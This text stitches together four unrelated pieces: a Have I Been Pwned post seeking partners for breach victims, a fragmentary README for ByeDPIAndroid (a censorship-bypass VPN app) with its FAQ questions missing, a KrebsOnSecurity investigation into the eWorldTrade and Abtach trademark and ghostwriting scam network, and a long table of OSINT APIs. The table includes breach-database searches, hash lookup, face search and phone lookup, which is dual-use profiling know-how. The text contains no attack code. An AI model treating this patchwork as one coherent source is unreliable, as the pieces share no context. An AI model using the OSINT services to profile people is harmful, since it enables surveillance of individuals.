For many years, people would come to Have I Been Pwned (HIBP), run a search on their email address, get the big red "Oh no - pwned!" response and then... I'm not sure. We really didn't have much guidance until we partnered with 1Password and started giving specific advice about how to secure your digital life. So, that's passwords sorted, but the impact of data breaches goes well beyond passwords alone...
There are many different ways people are impacted by breaches, for example, identity fraud. Breaches frequently contain precisely the sort of information that opens the door to impersonation and just taking a quick look at the HIBP stats now, there's a lot of data out there:
That's just the big numbers, then there's the long tail of all sorts of other exposed high-risk data, including partial credit cards (32 breaches), government-issued IDs (18 breaches) and passport numbers (7 breaches). As well as helping people choose good passwords, we want to help them stay safe in the other aspects of their lives put at risk when hackers run riot.
Identity protection services are a good example, and I might be showing my age here, but I've been using them since the 90's. Today, I use a local Aussie one called Truyu which is built by the Commonwealth Bank. Let me give you two examples from them to illustrate why it's a useful service:
The first one came on Melbourne Cup day last year, a day when Aussies traditionally get drunk and lose money betting on horse races. Because gambling (sorry - "gaming") is a heavily regulated industry, a whole bunch of identity data has to be provided if you want to set up an account with the likes of SportsBet. Whilst I personally maintain that gambling is a tax on people who can't do maths, Charlotte was convinced we should have a go anyway, which resulted in Truyu popping up this alert:
This was me (and yes, of course we lost everything we bet) but... what if it wasn't me, and my personal information had been used by someone else to open the account? That's the sort of thing I'd want to know about fast. As for all those "Illion Credit Header" entries, I asked Truyu to help explain what they mean and why they're important to know:
Yep, I'd definitely want to know if it wasn't me that initiated all that!
Then, on a recent visit to see the Irish National Cyber Security Centre, we found ourselves hungry in Dublin. Google Maps recommended this epic sushi place, but when we arrived, a sign at the front advised they didn't accept credit cards - in 2025!! Carrying only digital cards, having no cash and being hungry for sushi, I explored the only other avenue the store suggested: creating a Revolut account. Doing so required a bunch of personal information because, like betting, finance is a heavily regulated industry. This earned me another early warning from Truyu about the use of my data:
I pay Truyu A$4.99 each month via a subscription on my iPhone, and IMHO, it's money well spent. For full disclosure, Truyu is also an enterprise subscriber to HIBP (like 1Password is), and you can see breaches we've processed in their app too. I've included them here because they're a great example of a service that adds real value "after the breach", and it's one I genuinely use myself.
The point of all this is that there are organisations out there offering services that are particularly relevant to data breach victims, and we'd like to find the really good ones and put them on the new HIBP website. We've even built out some all-new dedicated spaces, for example on the new breach page:
But choosing partners is a bit more nuanced than that. For example, a service like Truyu caters to an Aussie audience, and the way identity protection works in the US or UK, for example, is different. We need different partners in different parts of the world, and further, offering different services. Identity protection is one thing, but what else? There are many different risks that both individuals and organisations (of which there are hundreds of thousands using HIBP today) face after being in a data breach.
So, we're looking for more partners that can make a positive difference for the folks that land on HIBP, do a search and then ask "now what?!" We're obviously going to be very selective and very cautious about who we work with because the trust people have in HIBP is not something I'll ever jeopardise by selecting the wrong partners. And, of course, any other brand that appears on this site needs to be one that reflects not just our values and mission, but is complementary to our favourite password manager as well.
Now that we're on the cusp of launching this new site (May 17 is our target), I'm inviting any organisations that think they fit the bill to get in touch with me and explain how they can make a positive difference to data breach victims looking for answers "after the breach".
Android application that runs a local VPN service to bypass DPI (Deep Packet Inspection) and censorship.
This application runs a SOCKS5 proxy ByeDPI and redirects all traffic through it.
https://github.com/dovecoteescapee/ByeDPIAndroid
To bypass some blocks, you may need to change the settings. More about the various settings can be found in the ByeDPI documentation.
You can ask for help in discussion.
No. All application features work without root.
No. The application uses the VPN mode on Android to redirect traffic, but does not send anything to a remote server. It does not encrypt traffic and does not hide your IP address.
plaintext Proxy type: SOCKS5 Proxy host: 127.0.0.1 Proxy port: 1080 (default)
None. The application does not send any data to a remote server. All traffic is processed on the device.
DPI (Deep Packet Inspection) is a technology for analyzing and filtering traffic. It is used by providers and government agencies to block sites and services.
For building the application, you need:
To build the application:
bash git clone --recurse-submodules
bash ./gradlew assembleRelease
app/build/outputs/apk/release/
A Texas firm recently charged with conspiring to distribute synthetic opioids in the United States is at the center of a vast network of companies in the U.S. and Pakistan whose employees are accused of using online ads to scam westerners seeking help with trademarks, book writing, mobile app development and logo designs, a new investigation reveals.
In an indictment (PDF) unsealed last month, the U.S. Department of Justice said Dallas-based eWorldTrade “operated an online business-to-business marketplace that facilitated the distribution of synthetic opioids such as isotonitazene and carfentanyl, both significantly more potent than fentanyl.”
Launched in 2017, eWorldTrade[.]com now features a seizure notice from the DOJ. eWorldTrade operated as a wholesale seller of consumer goods, including clothes, machinery, chemicals, automobiles and appliances. The DOJ’s indictment includes no additional details about eWorldTrade’s business, origins or other activity, and at first glance the website might appear to be a legitimate e-commerce platform that also just happened to sell some restricted chemicals.
A screenshot of the eWorldTrade homepage on March 25, 2025. Image: archive.org.
However, an investigation into the company’s founders reveals they are connected to a sprawling network of websites that have a history of extortionate scams involving trademark registration, book publishing, exam preparation, and the design of logos, mobile applications and websites.
Records from the U.S. Patent and Trademark Office (USPTO) show the eWorldTrade mark is owned by an Azneem Bilwani in Karachi (this name also is in the registration records for the now-seized eWorldTrade domain). Mr. Bilwani is perhaps better known as the director of the Pakistan-based IT provider Abtach Ltd., which has been singled out by the USPTO and Google for operating trademark registration scams (the main offices for eWorldtrade and Abtach share the same address in Pakistan).
In November 2021, the USPTO accused Abtach of perpetrating “an egregious scheme to deceive and defraud applicants for federal trademark registrations by improperly altering official USPTO correspondence, overcharging application filing fees, misappropriating the USPTO’s trademarks, and impersonating the USPTO.”
Abtach offered trademark registration at suspiciously low prices compared to legitimate costs of over USD $1,500, and claimed they could register a trademark in 24 hours. Abtach reportedly rebranded to Intersys Limited after the USPTO banned Abtach from filing any more trademark applications.
In a note published to its LinkedIn profile, Intersys Ltd. asserted last year that certain scam firms in Karachi were impersonating the company.
Many of Abtach’s employees are former associates of a similar company in Pakistan called Axact that was targeted by Pakistani authorities in a 2015 fraud investigation. Axact came under law enforcement scrutiny after The New York Times ran a front-page story about the company’s most lucrative scam business: Hundreds of sites peddling fake college degrees and diplomas.
People who purchased fake certifications were subsequently blackmailed by Axact employees posing as government officials, who would demand additional payments under threats of prosecution or imprisonment for having bought fraudulent “unauthorized” academic degrees. This practice created a continuous cycle of extortion, internally referred to as “upselling.”
“Axact took money from at least 215,000 people in 197 countries — one-third of them from the United States,” The Times reported. “Sales agents wielded threats and false promises and impersonated government officials, earning the company at least $89 million in its final year of operation.”
Dozens of top Axact employees were arrested, jailed, held for months, tried and sentenced to seven years for various fraud violations. But a 2019 research brief on Axact’s diploma mills found none of those convicted had started their prison sentence, and that several had fled Pakistan and never returned.
“In October 2016, a Pakistan district judge acquitted 24 Axact officials at trial due to ‘not enough evidence’ and then later admitted he had accepted a bribe (of $35,209) from Axact,” reads a history (PDF) published by the American Association of Collegiate Registrars and Admissions Officers.
In 2021, Pakistan’s Federal Investigation Agency (FIA) charged Bilwani and nearly four dozen others — many of them Abtach employees — with running an elaborate trademark scam. The authorities called it “the biggest money laundering case in the history of Pakistan,” and named a number of businesses based in Texas that allegedly helped move the proceeds of cybercrime.
A page from the March 2021 FIA report alleging that Digitonics Labs and Abtach employees conspired to extort and defraud consumers.
The FIA said the defendants operated a large number of websites offering low-cost trademark services to customers, before then “ignoring them after getting the funds and later demanding more funds from clients/victims in the name of up-sale (extortion).” The Pakistani law enforcement agency said that about 75 percent of customers received fake or fabricated trademarks as a result of the scams.
The FIA found Abtach operates in conjunction with a Karachi firm called Digitonics Labs, which earned a monthly revenue of around $2.5 million through the “extortion of international clients in the name of up-selling, the sale of fake/fabricated USPTO certificates, and the maintaining of phishing websites.”
According the Pakistani authorities, the accused also ran countless scams involving ebook publication and logo creation, wherein customers are subjected to advance-fee fraud and extortion — with the scammers demanding more money for supposed “copyright release” and threatening to release the trademark.
Also charged by the FIA was Junaid Mansoor, the owner of Digitonics Labs in Karachi. Mansoor’s U.K.-registered company Maple Solutions Direct Limited has run at least 700 ads for logo design websites since 2015, the Google Ads Transparency page reports. The company has approximately 88 ads running on Google as of today.
Junaid Mansoor. Source: youtube/@Olevels․com School.
Mr. Mansoor is actively involved with and promoting a Quran study business called quranmasteronline[.]com, which was founded by Junaid’s brother Qasim Mansoor (Qasim is also named in the FIA criminal investigation). The Google ads promoting quranmasteronline[.]com were paid for by the same account advertising a number of scam websites selling logo and web design services.
Junaid Mansoor did not respond to requests for comment. An address in Teaneck, New Jersey where Mr. Mansoor previously lived is listed as an official address of exporthub[.]com, a Pakistan-based e-commerce website that appears remarkably similar to eWorldTrade (Exporthub says its offices are in Texas). Interestingly, a search in Google for this domain shows ExportHub currently features multiple listings for fentanyl citrate from suppliers in China and elsewhere.
The CEO of Digitonics Labs is Muhammad Burhan Mirza, a former Axact official who was arrested by the FIA as part of its money laundering and trademark fraud investigation in 2021. In 2023, prosecutors in Pakistan charged Mirza, Mansoor and 14 other Digitonics employees with fraud, impersonating government officials, phishing, cheating and extortion. Mirza’s LinkedIn profile says he currently runs an educational technology/life coach enterprise called TheCoach360, which purports to help young kids “achieve financial independence.”
Reached via LinkedIn, Mr. Mirza denied having anything to do with eWorldTrade or any of its sister companies in Texas.
“Moreover, I have no knowledge as to the companies you have mentioned,” said Mr. Mirza, who did not respond to follow-up questions.
The current disposition of the FIA’s fraud case against the defendants is unclear. The investigation was marred early on by allegations of corruption and bribery. In 2021, Pakistani authorities alleged Bilwani paid a six-figure bribe to FIA investigators. Meanwhile, attorneys for Mr. Bilwani have argued that although their client did pay a bribe, the payment was solicited by government officials. Mr. Bilwani did not respond to requests for comment.
KrebsOnSecurity has learned that the people and entities at the center of the FIA investigations have built a significant presence in the United States, with a strong concentration in Texas. The Texas businesses promote websites that sell logo and web design, ghostwriting, and academic cheating services. Many of these entities have recently been sued for fraud and breach of contract by angry former customers, who claimed the companies relentlessly upsold them while failing to produce the work as promised.
For example, the FIA complaints named Retrocube LLC and 360 Digital Marketing LLC, two entities that share a street address with eWorldTrade: 1910 Pacific Avenue, Suite 8025, Dallas, Texas. Also incorporated at that Pacific Avenue address is abtach[.]ae, a web design and marketing firm based in Dubai; and intersyslimited[.]com, the new name of Abtach after they were banned by the USPTO. Other businesses registered at this address market services for logo design, mobile app development, and ghostwriting.
A list published in 2021 by Pakistan’s FIA of different front companies allegedly involved in scamming people who are looking for help with trademarks, ghostwriting, logos and web design.
360 Digital Marketing’s website 360digimarketing[.]com is owned by an Abtach front company called Abtech LTD. Meanwhile, business records show 360 Digi Marketing LTD is a U.K. company whose officers include former Abtach director Bilwani; Muhammad Saad Iqbal, formerly Abtach, now CEO of Intersys Ltd; Niaz Ahmed, a former Abtach associate; and Muhammad Salman Yousuf, formerly a vice president at Axact, Abtach, and Digitonics Labs.
Google’s Ads Transparency Center finds 360 Digital Marketing LLC ran at least 500 ads promoting various websites selling ghostwriting services . Another entity tied to Junaid Mansoor — a company called Octa Group Technologies AU — has run approximately 300 Google ads for book publishing services, promoting confusingly named websites like amazonlistinghub[.]com and barnesnoblepublishing[.]co.
360 Digital Marketing LLC ran approximately 500 ads for scam ghostwriting sites.
Rameez Moiz is a Texas resident and former Abtach product manager who has represented 360 Digital Marketing LLC and RetroCube. Moiz told KrebsOnSecurity he stopped working for 360 Digital Marketing in the summer of 2023. Mr. Moiz did not respond to follow-up questions, but an Upwork profile for him states that as of April 2025 he is employed by Dallas-based Vertical Minds LLC.
In April 2025, California resident Melinda Will sued the Texas firm Majestic Ghostwriting — which is doing business as ghostwritingsquad[.]com — alleging they scammed her out of $100,000 after she hired them to help write her book. Google’s ad transparency page shows Moiz’s employer Vertical Minds LLC paid to run approximately 55 ads for ghostwritingsquad[.]com and related sites.
Ms. Will’s lawsuit is just one of more than two dozen complaints over the past four years wherein plaintiffs sued one of this group’s web design, wiki editing or ghostwriting services. In 2021, a New Jersey man sued Octagroup Technologies, alleging they ripped him off when he paid a total of more than $26,000 for the design and marketing of a web-based mapping service.
The plaintiff in that case did not respond to requests for comment, but his complaint alleges Octagroup and a myriad other companies it contracted with produced minimal work product despite subjecting him to relentless upselling. That case was decided in favor of the plaintiff because the defendants never contested the matter in court.
In 2023, 360 Digital Marketing LLC and Retrocube LLC were sued by a woman who said they scammed her out of $40,000 over a book she wanted help writing. That lawsuit helpfully showed an image of the office front door at 1910 Pacific Ave Suite 8025, which featured the logos of 360 Digital Marketing, Retrocube, and eWorldTrade.
The front door at 1910 Pacific Avenue, Suite 8025, Dallas, Texas.
The lawsuit was filed pro se by Leigh Riley, a 64-year-old career IT professional who paid 360 Digital Marketing to have a company called Talented Ghostwriter co-author and promote a series of books she’d outlined on spirituality and healing.
“The main reason I hired them was because I didn’t understand what I call the formula for writing a book, and I know there’s a lot of marketing that goes into publishing,” Riley explained in an interview. “I know nothing about that stuff, and these guys were convincing that they could handle all aspects of it. Until I discovered they couldn’t write a damn sentence in English properly.”
Riley’s well-documented lawsuit (not linked here because it features a great deal of personal information) includes screenshots of conversations with the ghostwriting team, which was constantly assigning her to new writers and editors, and ghosting her on scheduled conference calls about progress on the project. Riley said she ended up writing most of the book herself because the work they produced was unusable.
“Finally after months of promising the books were printed and on their way, they show up at my doorstep with the wrong title on the book,” Riley said. When she demanded her money back, she said the people helping her with the website to promote the book locked her out of the site.
A conversation snippet from Leigh Riley’s lawsuit against Talented Ghostwriter, aka 360 Digital Marketing LLC. “Other companies once they have you money they don’t even respond or do anything,” the ghostwriting team manager explained.
Riley decided to sue, naming 360 Digital Marketing LLC and Retrocube LLC, among others. The companies offered to settle the matter for $20,000, which she accepted. “I didn’t have money to hire a lawyer, and I figured it was time to cut my losses,” she said.
Riley said she could have saved herself a great deal of headache by doing some basic research on Talented Ghostwriter, whose website claims the company is based in Los Angeles. According to the California Secretary of State, however, there is no registered entity by that name. Rather, the address claimed by talentedghostwriter[.]com is a vacant office building with a “space available” sign in the window.
California resident Walter Horsting discovered something similar when he sued 360 Digital Marketing in small claims court last year, after hiring a company called Vox Ghostwriting to help write, edit and promote a spy novel he’d been working on. Horsting said he paid Vox $3,300 to ghostwrite a 280-page book, and was upsold an Amazon marketing and publishing package for $7,500.
In an interview, Horsting said the prose that Vox Ghostwriting produced was “juvenile at best,” forcing him to rewrite and edit the work himself, and to partner with a graphical artist to produce illustrations. Horsting said that when it came time to begin marketing the novel, Vox Ghostwriting tried to further upsell him on marketing packages, while dodging scheduled meetings with no follow-up.
“They have a money back guarantee, and when they wouldn’t refund my money I said I’m taking you to court,” Horsting recounted. “I tried to serve them in Los Angeles but found no such office exists. I talked to a salon next door and they said someone else had recently shown up desperately looking for where the ghostwriting company went, and it appears there are a trail of corpses on this. I finally tracked down where they are in Texas.”
It was the same office that Ms. Riley served her lawsuit against. Horsting said he has a court hearing scheduled later this month, but he’s under no illusions that winning the case means he’ll be able to collect.
“At this point, I’m doing it out of pride more than actually expecting anything to come to good fortune for me,” he said.
The following mind map was helpful in piecing together key events, individuals and connections mentioned above. It’s important to note that this graphic only scratches the surface of the operations tied to this group. For example, in Case 2 we can see mention of academic cheating services, wherein people can be hired to take online proctored exams on one’s behalf. Those who hire these services soon find themselves subject to impersonation and blackmail attempts for larger and larger sums of money, with the threat of publicly exposing their unethical academic cheating activity.
A “mind map” illustrating the connections between and among entities referenced in this story. Click to enlarge.
KrebsOnSecurity reviewed the Google Ad Transparency links for nearly 500 different websites tied to this network of ghostwriting, logo, app and web development businesses. Those website names were then fed into spyfu.com, a competitive intelligence company that tracks the reach and performance of advertising keywords. Spyfu estimates that between April 2023 and April 2025, those websites spent more than $10 million on Google ads.
Reached for comment, Google said in a written statement that it is constantly policing its ad network for bad actors, pointing to an ads safety report (PDF) showing Google blocked or removed 5.1 billion bad ads last year — including more than 500 million ads related to trademarks.
“Our policy against Enabling Dishonest Behavior prohibits products or services that help users mislead others, including ads for paper-writing or exam-taking services,” the statement reads. “When we identify ads or advertisers that violate our policies, we take action, including by suspending advertiser accounts, disapproving ads, and restricting ads to specific domains when appropriate.”
Google did not respond to specific questions about the advertising entities mentioned in this story, saying only that “we are actively investigating this matter and addressing any policy violations, including suspending advertiser accounts when appropriate.”
From reviewing the ad accounts that have been promoting these scam websites, it appears Google has very recently acted to remove a large number of the offending ads. Prior to my notifying Google about the extent of this ad network on April 28, the Google Ad Transparency network listed over 500 ads for 360 Digital Marketing; as of this publication, that number had dwindled to 10.
On April 30, Google announced that starting this month its ads transparency page will display the payment profile name as the payer name for verified advertisers, if that name differs from their verified advertiser name. Searchengineland.com writes the changes are aimed at increasing accountability in digital advertising.
This spreadsheet lists the domain names, advertiser names, and Google Ad Transparency links for more than 350 entities offering ghostwriting, publishing, web design and academic cheating services.
KrebsOnSecurity would like to thank the anonymous security researcher NatInfoSec for their assistance in this investigation.
For further reading on Abtach and its myriad companies in all of the above-mentioned verticals (ghostwriting, logo design, etc.), see this Wikiwand entry.
Thank you for following me! https://cybdetective.com
Name | Link | Description | Price |
---|---|---|---|
Shodan | https://developer.shodan.io | Search engine for Internet connected host and devices | from $59/month |
Netlas.io | https://netlas-api.readthedocs.io/en/latest/ | Search engine for Internet connected host and devices. Read more at Netlas CookBook | Partly FREE |
Fofa.so | https://fofa.so/static_pages/api_help | Search engine for Internet connected host and devices | ??? |
Censys.io | https://censys.io/api | Search engine for Internet connected host and devices | Partly FREE |
Hunter.how | https://hunter.how/search-api | Search engine for Internet connected host and devices | Partly FREE |
Fullhunt.io | https://api-docs.fullhunt.io/#introduction | Search engine for Internet connected host and devices | Partly FREE |
IPQuery.io | https://ipquery.io | API for ip information such as ip risk, geolocation data, and asn details | FREE |
Name | Link | Description | Price |
---|---|---|---|
Social Links | https://sociallinks.io/products/sl-api | Email info lookup, phone info lookup, individual and company profiling, social media tracking, dark web monitoring and more. Code example of using this API for face search in this repo | PAID. Price per request |
Name | Link | Description | Price |
---|---|---|---|
Numverify | https://numverify.com | Global Phone Number Validation & Lookup JSON API. Supports 232 countries. | 250 requests FREE |
Twillo | https://www.twilio.com/docs/lookup/api | Provides a way to retrieve additional information about a phone number | Free or $0.01 per request (for caller lookup) |
Plivo | https://www.plivo.com/lookup/ | Determine carrier, number type, format, and country for any phone number worldwide | from $0.04 per request |
GetContact | https://github.com/kovinevmv/getcontact | Find info about user by phone number | from $6,89 in months/100 requests |
Veriphone | https://veriphone.io/ | Phone number validation & carrier lookup | 1000 requests/month FREE |
Name | Link | Description | Price |
---|---|---|---|
Global Address | https://rapidapi.com/adminMelissa/api/global-address/ | Easily verify, check or lookup address | FREE |
US Street Address | https://smartystreets.com/docs/cloud/us-street-api | Validate and append data for any US postal address | FREE |
Google Maps Geocoding API | https://developers.google.com/maps/documentation/geocoding/overview | convert addresses (like "1600 Amphitheatre Parkway, Mountain View, CA") into geographic coordinates | 0.005 USD per request |
Postcoder | https://postcoder.com/address-lookup | Find adress by postcode | £130/5000 requests |
Zipcodebase | https://zipcodebase.com | Lookup postal codes, calculate distances and much more | 5000 requests FREE |
Openweathermap geocoding API | https://openweathermap.org/api/geocoding-api | get geographical coordinates (lat, lon) by using name of the location (city name or area name) | 60 calls/minute 1,000,000 calls/month |
DistanceMatrix | https://distancematrix.ai/product | Calculate, evaluate and plan your routes | $1.25-$2 per 1000 elements |
Geotagging API | https://geotagging.ai/ | Predict geolocations by texts | Freemium |
Name | Link | Description | Price |
---|---|---|---|
Approuve.com | https://appruve.co | Allows you to verify the identities of individuals, businesses, and connect to financial account data across Africa | Paid |
Onfido.com | https://onfido.com | Onfido Document Verification lets your users scan a photo ID from any device, before checking it's genuine. Combined with Biometric Verification, it's a seamless way to anchor an account to the real identity of a customer. India | Paid |
Superpass.io | https://surepass.io/passport-id-verification-api/ | Passport, Photo ID and Driver License Verification in India | Paid |
Name | Link | Description | Price |
---|---|---|---|
Open corporates | https://api.opencorporates.com | Companies information | Paid, price upon request |
Linkedin company search API | https://docs.microsoft.com/en-us/linkedin/marketing/integrations/community-management/organizations/company-search?context=linkedin%2Fcompliance%2Fcontext&tabs=http | Find companies using keywords, industry, location, and other criteria | FREE |
Mattermark | https://rapidapi.com/raygorodskij/api/Mattermark/ | Get companies and investor information | free 14-day trial, from $49 per month |
Name | Link | Description | Price |
---|---|---|---|
API OSINT DS | https://github.com/davidonzo/apiosintDS | Collect info about IPv4/FQDN/URLs and file hashes in md5, sha1 or sha256 | FREE |
InfoDB API | https://www.ipinfodb.com/api | The API returns the location of an IP address (country, region, city, zipcode, latitude, longitude) and the associated timezone in XML, JSON or plain text format | FREE |
Domainsdb.info | https://domainsdb.info | Registered Domain Names Search | FREE |
BGPView | https://bgpview.docs.apiary.io/# | allowing consumers to view all sort of analytics data about the current state and structure of the internet | FREE |
DNSCheck | https://www.dnscheck.co/api | monitor the status of both individual DNS records and groups of related DNS records | up to 10 DNS records/FREE |
Cloudflare Trace | https://github.com/fawazahmed0/cloudflare-trace-api | Get IP Address, Timestamp, User Agent, Country Code, IATA, HTTP Version, TLS/SSL Version & More | FREE |
Host.io | https://host.io/ | Get info about domain | FREE |
Name | Link | Description | Price |
---|---|---|---|
BeVigil OSINT API | https://bevigil.com/osint-api | provides access to millions of asset footprint data points including domain intel, cloud services, API information, and third party assets extracted from millions of mobile apps being continuously uploaded and scanned by users on bevigil.com | 50 credits free/1000 credits/$50 |
Name | Link | Description | Price |
---|---|---|---|
WebScraping.AI | https://webscraping.ai/ | Web Scraping API with built-in proxies and JS rendering | FREE |
ZenRows | https://www.zenrows.com/ | Web Scraping API that bypasses anti-bot solutions while offering JS rendering, and rotating proxies apiKey Yes Unknown | FREE |
Name | Link | Description | Price |
---|---|---|---|
Whois freaks | https://whoisfreaks.com/ | well-parsed and structured domain WHOIS data for all domain names, registrars, countries and TLDs since the birth of internet | $19/5000 requests |
WhoisXMLApi | https://whois.whoisxmlapi.com | gathers a variety of domain ownership and registration data points from a comprehensive WHOIS database | 500 requests in month/FREE |
IPtoWhois | https://www.ip2whois.com/developers-api | Get detailed info about a domain | 500 requests/month FREE |
Name | Link | Description | Price |
---|---|---|---|
Ipstack | https://ipstack.com | Detect country, region, city and zip code | FREE |
Ipgeolocation.io | https://ipgeolocation.io | provides country, city, state, province, local currency, latitude and longitude, company detail, ISP lookup, language, zip code, country calling code, time zone, current time, sunset and sunrise time, moonset and moonrise | 30 000 requests per month/FREE |
IPInfoDB | https://ipinfodb.com/api | Free Geolocation tools and APIs for country, region, city and time zone lookup by IP address | FREE |
IP API | https://ip-api.com/ | Free domain/IP geolocation info | FREE |
Name | Link | Description | Price |
---|---|---|---|
Mylnikov API | https://www.mylnikov.org | public API implementation of Wi-Fi Geo-Location database | FREE |
Wigle | https://api.wigle.net/ | get location and other information by SSID | FREE |
Name | Link | Description | Price |
---|---|---|---|
PeetingDB | https://www.peeringdb.com/apidocs/ | Database of networks, and the go-to location for interconnection data | FREE |
PacketTotal | https://packettotal.com/api.html | .pcap files analyze | FREE |
Name | Link | Description | Price |
---|---|---|---|
Binlist.net | https://binlist.net/ | get information about bank by BIN | FREE |
FDIC Bank Data API | https://banks.data.fdic.gov/docs/ | institutions, locations and history events | FREE |
Amdoren | https://www.amdoren.com/currency-api/ | Free currency API with over 150 currencies | FREE |
VATComply.com | https://www.vatcomply.com/documentation | Exchange rates, geolocation and VAT number validation | FREE |
Alpaca | https://alpaca.markets/docs/api-documentation/api-v2/market-data/alpaca-data-api-v2/ | Realtime and historical market data on all US equities and ETFs | FREE |
Swiftcodesapi | https://swiftcodesapi.com | Verifying the validity of a bank SWIFT code or IBAN account number | $39 per month/4000 swift lookups |
IBANAPI | https://ibanapi.com | Validate IBAN number and get bank account information from it | Freemium/10$ Starter plan |
Name | Link | Description | Price |
---|---|---|---|
EVA | https://eva.pingutil.com/ | Measuring email deliverability & quality | FREE |
Mailboxlayer | https://mailboxlayer.com/ | Simple REST API measuring email deliverability & quality | 100 requests FREE, 5000 requests in month — $14.49 |
EmailCrawlr | https://emailcrawlr.com/ | Get key information about company websites. Find all email addresses associated with a domain. Get social accounts associated with an email. Verify email address deliverability. | 200 requests FREE, 5000 requets — $40 |
Voila Norbert | https://www.voilanorbert.com/api/ | Find anyone's email address and ensure your emails reach real people | from $49 in month |
Kickbox | https://open.kickbox.com/ | Email verification API | FREE |
FachaAPI | https://api.facha.dev/ | Allows checking if an email domain is a temporary email domain | FREE |
Name | Link | Description | Price |
---|---|---|---|
Genderize.io | https://genderize.io | Instantly answers the question of how likely a certain name is to be male or female and shows the popularity of the name. | 1000 names/day free |
Agify.io | https://agify.io | Predicts the age of a person given their name | 1000 names/day free |
Nataonalize.io | https://nationalize.io | Predicts the nationality of a person given their name | 1000 names/day free |
Name | Link | Description | Price |
---|---|---|---|
HaveIBeenPwned | https://haveibeenpwned.com/API/v3 | allows the list of pwned accounts (email addresses and usernames) | $3.50 per month |
Psdmp.ws | https://psbdmp.ws/api | search in Pastebin | $9.95 per 10000 requests |
LeakPeek | https://psbdmp.ws/api | searc in leaks databases | $9.99 per 4 weeks unlimited access |
BreachDirectory.com | https://breachdirectory.com/api_documentation | search domain in data breaches databases | FREE |
LeekLookup | https://leak-lookup.com/api | search domain, email_address, fullname, ip address, phone, password, username in leaks databases | 10 requests FREE |
BreachDirectory.org | https://rapidapi.com/rohan-patra/api/breachdirectory/pricing | search domain, email_address, fullname, ip address, phone, password, username in leaks databases (possible to view password hashes) | 50 requests in month/FREE |
Name | Link | Description | Price |
---|---|---|---|
Wayback Machine API (Memento API, CDX Server API, Wayback Availability JSON API) | https://archive.org/help/wayback_api.php | Retrieve information about Wayback capture data | FREE |
TROVE (Australian Web Archive) API | https://trove.nla.gov.au/about/create-something/using-api | Retrieve information about TROVE capture data | FREE |
Archive-it API | https://support.archive-it.org/hc/en-us/articles/115001790023-Access-Archive-It-s-Wayback-index-with-the-CDX-C-API | Retrieve information about archive-it capture data | FREE |
UK Web Archive API | https://ukwa-manage.readthedocs.io/en/latest/#api-reference | Retrieve information about UK Web Archive capture data | FREE |
Arquivo.pt API | https://github.com/arquivo/pwa-technologies/wiki/Arquivo.pt-API | Allows full-text search and access preserved web content and related metadata. It is also possible to search by URL, accessing all versions of preserved web content. API returns a JSON object. | FREE |
Library Of Congress archive API | https://www.loc.gov/apis/ | Provides structured data about Library of Congress collections | FREE |
BotsArchive | https://botsarchive.com/docs.html | JSON formatted details about Telegram Bots available in database | FREE |
Name | Link | Description | Price |
---|---|---|---|
MD5 Decrypt | https://md5decrypt.net/en/Api/ | Search for decrypted hashes in the database | 1.99 EURO/day |
Name | Link | Description | Price |
---|---|---|---|
BTC.com | https://btc.com/btc/adapter?type=api-doc | get information about addresses and transanctions | FREE |
Blockchair | https://blockchair.com | Explore data stored on 17 blockchains (BTC, ETH, Cardano, Ripple etc) | $0.33 - $1 per 1000 calls |
Bitcointabyse | https://www.bitcoinabuse.com/api-docs | Lookup bitcoin addresses that have been linked to criminal activity | FREE |
Bitcoinwhoswho | https://www.bitcoinwhoswho.com/api | Scam reports on the Bitcoin Address | FREE |
Etherscan | https://etherscan.io/apis | Ethereum explorer API | FREE |
apilayer coinlayer | https://coinlayer.com | Real-time Crypto Currency Exchange Rates | FREE |
BlockFacts | https://blockfacts.io/ | Real-time crypto data from multiple exchanges via a single unified API, and much more | FREE |
Brave NewCoin | https://bravenewcoin.com/developers | Real-time and historic crypto data from more than 200+ exchanges | FREE |
WorldCoinIndex | https://www.worldcoinindex.com/apiservice | Cryptocurrencies Prices | FREE |
WalletLabels | https://www.walletlabels.xyz/docs | Labels for 7,5 million Ethereum wallets | FREE |
Name | Link | Description | Price |
---|---|---|---|
VirusTotal | https://developers.virustotal.com/reference | files and urls analyze | Public API is FREE |
AbuseLPDB | https://docs.abuseipdb.com/#introduction | IP/domain/URL reputation | FREE |
AlienVault Open Threat Exchange (OTX) | https://otx.alienvault.com/api | IP/domain/URL reputation | FREE |
Phisherman | https://phisherman.gg | IP/domain/URL reputation | FREE |
URLScan.io | https://urlscan.io/about-api/ | Scan and Analyse URLs | FREE |
Web of Thrust | https://support.mywot.com/hc/en-us/sections/360004477734-API- | IP/domain/URL reputation | FREE |
Threat Jammer | https://threatjammer.com/docs/introduction-threat-jammer-user-api | IP/domain/URL reputation | ??? |
Name | Link | Description | Price |
---|---|---|---|
Search4faces | https://search4faces.com/api.html | Detect and locate human faces within an image, and returns high-precision face bounding boxes. Face⁺⁺ also allows you to store metadata of each detected face for future use. | $21 per 1000 requests |
## Face Detection
Name | Link | Description | Price |
---|---|---|---|
Face++ | https://www.faceplusplus.com/face-detection/ | Search for people in social networks by facial image | from 0.03 per call |
BetaFace | https://www.betafaceapi.com/wpa/ | Can scan uploaded image files or image URLs, find faces and analyze them. API also provides verification (faces comparison) and identification (faces search) services, as well able to maintain multiple user-defined recognition databases (namespaces) | 50 image per day FREE/from 0.15 EUR per request |
## Reverse Image Search
Name | Link | Description | Price |
---|---|---|---|
Google Reverse images search API | https://github.com/SOME-1HING/google-reverse-image-api/ | This is a simple API built using Node.js and Express.js that allows you to perform Google Reverse Image Search by providing an image URL. | FREE (UNOFFICIAL) |
TinEyeAPI | https://services.tineye.com/TinEyeAPI | Verify images, Moderate user-generated content, Track images and brands, Check copyright compliance, Deploy fraud detection solutions, Identify stock photos, Confirm the uniqueness of an image | Start from $200/5000 searches |
Bing Images Search API | https://www.microsoft.com/en-us/bing/apis/bing-image-search-api | With Bing Image Search API v7, help users scour the web for images. Results include thumbnails, full image URLs, publishing website info, image metadata, and more. | 1,000 requests free per month FREE |
MRISA | https://github.com/vivithemage/mrisa | MRISA (Meta Reverse Image Search API) is a RESTful API which takes an image URL, does a reverse Google image search, and returns a JSON array with the search results | FREE? (no official) |
PicImageSearch | https://github.com/kitUIN/PicImageSearch | Aggregator for different Reverse Image Search API | FREE? (no official) |
## AI Geolocation
Name | Link | Description | Price |
---|---|---|---|
Geospy | https://api.geospy.ai/ | Detecting estimation location of uploaded photo | Access by request |
Picarta | https://picarta.ai/api | Detecting estimation location of uploaded photo | 100 request/day FREE |
Name | Link | Description | Price |
---|---|---|---|
Twitch | https://dev.twitch.tv/docs/v5/reference | ||
